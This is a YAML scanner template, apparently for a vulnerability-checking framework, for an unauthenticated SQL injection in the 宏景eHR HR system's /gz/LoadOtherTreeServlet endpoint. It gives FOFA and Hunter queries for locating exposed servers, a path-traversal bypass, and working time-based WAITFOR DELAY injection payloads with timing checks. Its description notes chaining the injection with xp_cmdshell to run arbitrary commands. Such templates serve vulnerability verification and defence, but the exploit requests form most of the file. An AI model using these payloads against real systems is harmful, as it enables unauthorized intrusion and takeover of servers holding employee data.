product: 宏景eHR人力资源信息管理系统
vName: 宏景eHR LoadOtherTreeServlet接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 宏景eHR /gz/LoadOtherTreeServlet 接口处存在sql注入漏洞，未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。
version: ''
note: ''
search:
  FOFA: app="HJSOFT-HCM"
  Hunter: app.name="宏景 HCM"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/140179591
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A5%27--&flag=1
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: ">="
            num: 5
  - exp:
      method: get
      follow: false
      path: /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A0%27--&flag=1
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: "<="
            num: 3